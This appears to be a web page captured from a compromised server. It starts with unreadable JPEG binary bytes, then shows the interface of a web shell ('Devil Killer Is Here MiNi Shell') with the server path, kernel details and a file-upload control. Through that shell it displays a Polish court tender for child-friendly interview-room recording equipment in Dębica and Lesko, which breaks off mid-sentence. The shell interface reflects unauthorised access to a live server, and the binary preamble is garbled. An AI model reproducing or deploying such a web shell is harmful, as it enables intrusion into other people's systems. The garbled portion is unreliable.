JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211116/0027071101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa, montaż i uruchomienie wyposażenia technicznego Przyjaznego Pokoju Przesłuchań w Sądzie Rejonowym w Dębicy i Sądzie Rejonowym w Lesku, wraz z demontażem wyposażenia istniejącego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Apelacyjny w Rzeszowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 005139300</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piłsudskiego 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-001</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@rzeszow.sa.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rzeszow.sa.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> sąd </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa, montaż i uruchomienie wyposażenia technicznego Przyjaznego Pokoju Przesłuchań w Sądzie Rejonowym w Dębicy i Sądzie Rejonowym w Lesku, wraz z demontażem wyposażenia istniejącego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fe5c7811-46c4-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00270711</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00013150/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa wyposażenia technicznego „przyjaznych pokoi przesłuchań”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> ezamowienia.ms.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">ezamowienia.ms.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania opisane w Części XIII SWZ. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z usług Systemu (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla wszystkich użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">F-271-94/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: <br/>- dostawa, montaż i uruchomienie urządzeń wyposażenia technicznego przyjaznego pokoju przesłuchań w Sądzie Rejonowym w Dębicy przy ul. Słonecznej 3 <br/>- przeszkolenie wskazanych osób personelu sądu w obsłudze urządzeń,<br/>- wykonanie dokumentacji powykonawczej obejmującej co najmniej: schemat rozmieszczenia i podłączenia urządzeń, atesty, certyfikaty lub świadectwa dopuszczenia urządzeń i materiałów (jeśli dotyczy), instrukcje obsługi systemu i zainstalowanych urządzeń,<br/>- demontaż wyposażenia istniejącego,<br/>- świadczenie usług i wsparcia technicznego w okresie gwarancji.<br/>2. Na przyjazne pokoje przesłuchań, w rozumieniu Rozporządzenia Ministra Sprawiedliwości z dnia 28 września 2020r. w sprawie sposobu przygotowania przesłuchania przeprowadzanego w trybie określonym w art. 185a-185c Kodeksu postępowania karnego (Dz.U. 2020 poz. 1691) (dalej „Rozporządzenie”) składają się w szczególności: pokój przesłuchań i pokój techniczny. <br/>Pokój techniczny i pokój przesłuchań zlokalizowane są w odrębnych pomieszczeniach<br/>Pokój przesłuchań i pokój techniczny połączone są ze sobą za pomocą środków technicznych umożliwiających przeprowadzenie przesłuchania na odległość z jednoczesnym bezpośrednim przekazem obrazu i dźwięku. W przypadku bezpośredniego sąsiedztwa obu pomieszczeń w ścianie rozdzielenia może być montowane lustro obserwacyjne tzw. „lustro weneckie”.<br/><br/>3. Wyposażenie techniczne będące przedmiotem niniejszego postepowania musi zapewnić wymagania określone w § 9 i § 10 Rozporządzenia.<br/>Wytyczne dotyczące wyposażenia przyjaznego pokoju przesłuchań<br/>Pokój przesłuchań w którym w trakcie przesłuchania przebywają: osoba przesłuchiwana, sędzia, biegły psycholog, tłumacz w przypadku powołania oraz inne osoby których mowa w § 3 ust. 2 Rozporządzenia wyposaża się w środki techniczne umożliwiające:<br/>- utrwalanie obrazu i dźwięku z przebiegu przesłuchania,<br/>- obserwowanie i słuchanie przebiegu przesłuchania przez uczestników czynności przebywających w pokoju technicznym,<br/>- przekazywanie sędziemu oraz psychologowi pytań do świadka oraz wypowiedzi kierowanych przez uczestników czynności przebywających w pokoju technicznym,<br/>- utrwalanie pytań i wypowiedzi o których mowa powyżej, w formie zapisu dźwięku,<br/>- urządzenia techniczne zlokalizowane w pokoju przesłuchań nie powinny być ukrywane przed świadkami oraz nie powinny rozpraszać uwagi świadka (rozmiary urządzeń oraz sposób ich umieszczenia),<br/>- w pokoju przesłuchań nie należy umieszczać np. głośników, które umożliwiały by odsłuch zadawanych za pośrednictwem sędziego lub psychologa pytań do świadka oraz wypowiedzi kierowanych przez uczestników czynności przebywających w pokoju technicznym, <br/>- mikrofony w pokoju przesłuchań powinny być na tyle czułe, aby umożliwiły rejestrację szeptu świadka.<br/>Pokój techniczny, w którym w trakcie przesłuchania mogą przebywać: prokurator, obrońca, pełnomocnik pokrzywdzonego oraz osoby, o których mowa w § 3 ust. 2 Rozporządzenia wyposaża się w środki techniczne umożliwiające:<br/>- przekazywanie sędziemu prowadzącemu przesłuchanie oraz psychologowi pytań do osoby przesłuchiwanej, oraz wypowiedzi kierowanych do uczestników czynności przebywających w pokoju technicznym,<br/>- obserwacje przesłuchania poprzez przekaz obrazu i dźwięku.<br/>Ponadto:<br/>- przynajmniej jedna kamera powinna mieć możliwość robienia zbliżeń (rejestracji mimiki twarzy osoby przesłuchiwanej) oraz obrotu głowicy (kierunek filmowania), powinna być sterowana. Druga kamera ujmując cały pokój przesłuchań powinna pokazywać, kto bierze udział w przesłuchaniu,<br/>- środki techniczne mają zapewnić zabezpieczenie utrwalonego obrazu i dźwięku z przesłuchania, aby dostęp do nich miały tylko osoby upoważnione,<br/>- należy przewidzieć urządzenia umożliwiające utrwalanie dźwięku z przebiegu przesłuchania na dodatkowym nośniku,<br/>- urządzenia służące do utrwalania obrazu i dźwięku z przebiegu przesłuchania należy umieścić w pokoju technicznym,<br/>- obraz z kamer i dźwięk powinny być rejestrowane na twardym dysku lub pamięci typu flash. Format zapisanego materiału powinien byś formatem standardowym, dostępnym dla komputerów znajdujących się na sali rozpraw.<br/>- system ma umożliwiać przegląd i odtwarzanie zarejestrowanego wcześniej materiału, również na monitorach zlokalizowanych w pokoju technicznym,<br/>- dźwięk z pokoju przesłuchań ma być słyszany w pokoju technicznym przy wykorzystaniu:<br/>•	głośników systemu nagłośnienia;<br/>•	słuchawek do odsłuchu – 2 komplety słuchawek przewodowych, nagłownych, z obrotowym nausznikiem pozwalającym na wygodne odsłuch tylko jednym uchem. (słuchawki pozwalają na odsłuch dźwięku z pokoju przesłuchań i mikrofonów typu „naciśnij i mów”),<br/>- system nie może wymagać do jego obsługi, do i wykonania przesłuchania specjalistycznej wiedzy – obsługa ma być intuicyjna, uruchomienie „jednym klawiszem”,<br/>- należy przyjąć rozwiązania pozwalające na rozszerzenie w przyszłości o dodatkową funkcjonalność polegająca na możliwości przekazu dźwięku i obrazu (w czasie rzeczywistym i odtwarzań) z przyjaznego pokoju przesłuchań na salę rozpraw, za pośrednictwem lokalnej sieci strukturalnej IT. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32330000-5 - Aparatura do nagrywania i powielania dźwięku i obrazu wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">51313000-9 - Usługi instalowania urządzeń dźwiękowych</p> <p class="mb-0">51314000-6 - Usługi instalowania urządzeń wideo</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres obowiązywania gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: <br/>- dostawa, montaż i uruchomienie urządzeń wyposażenia technicznego przyjaznego pokoju przesłuchań w Sądzie Rejonowym w Lesku przy pl. Konstytucji 3-go Maja 9,<br/>- przeszkolenie wskazanych osób personelu sądu w obsłudze urządzeń,<br/>- wykonanie dokumentacji powykonawczej obejmującej co najmniej: schemat rozmieszczenia i podłączenia urządzeń, atesty, certyfikaty lub świadectwa dopuszczenia urządzeń i materiałów (jeśli dotyczy), instrukcje obsługi systemu i zainstalowanych urządzeń,<br/>- demontaż wyposażenia istniejącego,<br/>- świadczenie usług i wsparcia technicznego w okresie gwarancji.<br/>2. Na przyjazne pokoje przesłuchań, w rozumieniu Rozporządzenia Ministra Sprawiedliwości z dnia 28 września 2020r. w sprawie sposobu przygotowania przesłuchania przeprowadzanego w trybie określonym w art. 185a-185c Kodeksu postępowania karnego (Dz.U. 2020 poz. 1691) (dalej „Rozporządzenie”) składają się w szczególności: pokój przesłuchań i pokój techniczny. <br/>Pokój techniczny i pokój przesłuchań zlokalizowane są w odrębnych pomieszczeniach<br/>Pokój przesłuchań i pokój techniczny połączone są ze sobą za pomocą środków technicznych umożliwiających przeprowadzenie przesłuchania na odległość z jednoczesnym bezpośrednim przekazem obrazu i dźwięku. W przypadku bezpośredniego sąsiedztwa obu pomieszczeń w ścianie rozdzielenia może być montowane lustro obserwacyjne tzw. „lustro weneckie”.<br/><br/>3. Wyposażenie techniczne będące przedmiotem niniejszego postepowania musi zapewnić wymagania określone w § 9 i § 10 Rozporządzenia.<br/>Wytyczne dotyczące wyposażenia przyjaznego pokoju przesłuchań<br/>Pokój przesłuchań w którym w trakcie przesłuchania przebywają: osoba przesłuchiwana, sędzia, biegły psycholog, tłumacz w przypadku powołania oraz inne osoby których mowa w § 3 ust. 2 Rozporządzenia wyposaża się w środki techniczne umożliwiające:<br/>- utrwalanie obrazu i dźwięku z przebiegu przesłuchania,<br/>- obserwowanie i słuchanie przebiegu przesłuchania przez uczestników czynności przebywających w pokoju technicznym,<br/>- przekazywanie sędziemu oraz psychologowi pytań do świadka oraz wypowiedzi kierowanych przez uczestników czynności przebywających w pokoju technicznym,<br/>- utrwalanie pytań i wypowiedzi o których mowa powyżej, w formie zapisu dźwięku,<br/>- urządzenia techniczne zlokalizowane w pokoju przesłuchań nie powinny być ukrywane przed świadkami oraz nie powinny rozpraszać uwagi świadka (rozmiary urządzeń oraz sposób ich umieszczenia),<br/>- w pokoju przesłuchań nie należy umieszczać np. głośników, które umożliwiały by odsłuch zadawanych za pośrednictwem sędziego lub psychologa pytań do świadka oraz wypowiedzi kierowanych przez uczestników czynności przebywających w pokoju technicznym, <br/>- mikrofony w pokoju przesłuchań powinny być na tyle czułe, aby umożliwiły rejestrację szeptu świadka.<br/>Pokój techniczny, w którym w trakcie przesłuchania mogą przebywać: prokurator, obrońca, pełnomocnik pokrzywdzonego oraz osoby, o których mowa w § 3 ust. 2 Rozporządzenia wyposaża się w środki techniczne umożliwiające:<br/>- przekazywanie sędziemu prowadzącemu przesłuchanie oraz psychologowi pytań do osoby przesłuchiwanej, oraz wypowiedzi kierowanych do uczestników czynności przebywających w pokoju technicznym,<br/>- obserwacje przesłuchania poprzez przekaz obrazu i dźwięku.<br/>Ponadto:<br/>- przynajmniej jedna kamera powinna mieć możliwość robienia zbliżeń (rejestracji mimiki twarzy osoby przesłuchiwanej) oraz obrotu głowicy (kierunek filmowania), powinna być sterowana. Druga kamera ujmując cały pokój przesłuchań powinna pokazywać, kto bierze udział w przesłuchaniu,<br/>- środki techniczne mają zapewnić zabezpieczenie utrwalonego obrazu i dźwięku z przesłuchania, aby dostęp do nich miały tylko osoby upoważnione,<br/>- należy przewidzieć urządzenia umożliwiające utrwalanie dźwięku z przebiegu przesłuchania na dodatkowym nośniku,<br/>- urządzenia służące do utrwalania obrazu i dźwięku z przebiegu przesłuchania należy umieścić w pokoju technicznym,<br/>- obraz z kamer i dźwięk powinny być rejestrowane na twardym dysku lub pamięci typu flash. Format zapisanego materiału powinien byś formatem standardowym, dostępnym dla komputerów znajdujących się na sali rozpraw.<br/>- system ma umożliwiać przegląd i odtwarzanie zarejestrowanego wcześniej materiału, również na monitorach zlokalizowanych w pokoju technicznym,<br/>- dźwięk z pokoju przesłuchań ma być słyszany w pokoju technicznym przy wykorzystaniu:<br/>•	głośników systemu nagłośnienia;<br/>•	słuchawek do odsłuchu – 2 komplety słuchawek przewodowych, nagłownych, z obrotowym nausznikiem pozwalającym na wygodne odsłuch tylko jednym uchem. (słuchawki pozwalają na odsłuch dźwięku z pokoju przesłuchań i mikrofonów typu „naciśnij i mów”),<br/>- system nie może wymagać do jego obsługi, do i wykonania przesłuchania specjalistycznej wiedzy – obsługa ma być intuicyjna, uruchomienie „jednym klawiszem”,<br/>- należy przyjąć rozwiązania pozwalające na rozszerzenie w przyszłości o dodatkową funkcjonalność polegająca na możliwości przekazu dźwięku i obrazu (w czasie rzeczywistym i odtwarzań) z przyjaznego pokoju przesłuchań na salę rozpraw, za pośrednictwem lokalnej sieci strukturalnej IT. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32330000-5 - Aparatura do nagrywania i powielania dźwięku i obrazu wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">51313000-9 - Usługi instalowania urządzeń dźwiękowych</p> <p class="mb-0">51314000-6 - Usługi instalowania urządzeń wideo</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres obowiązywania gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej tj. <br/>posiadają doświadczenie w realizacji co najmniej jednej podobnej dostawie wraz z uruchomieniem, w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) o wartości nie niższej niż odpowiednio:<br/>- w zakresie pakietu Nr 1 – 50 000,00 zł,<br/>- w zakresie pakietu Nr 2 – 50 000,00 zł.<br/><br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw wykonywanych wspólnie z innymi wykonawcami, wówczas wykaz, o którym mowa w części X niniejszej SWZ pkt 1 ppkt 2 a) winien dotyczyć dostaw, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonaniu bezpośrednio uczestniczył lub uczestniczy. <br/><br/>W przypadku umów nadal trwających, umowa będzie uznana za spełniającą postawiony warunek, jeżeli wartość wykonanych dostaw na dzień składania ofert, będzie nie mniejsza niż wymagana przez Zamawiającego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, Wykonawca zobowiązany jest do złożenia następujących oświadczeń i dokumentów:<br/>Wymagany dokument<br/>a)	Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postepowaniu, w zakresie wskazanym przez Zamawiającego, zgodnie z Załącznikiem nr 3 do SWZ. Oświadczenie należy złożyć wraz z ofertą.<br/>Forma dokumentu: dokument w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, lub dokument jako cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>b)	Odpis z właściwego rejestru lub z centralnej ewidencji i informacji <br/>o działalności gospodarczej<br/>Odpis lub informacja z Krajowego Rejestru 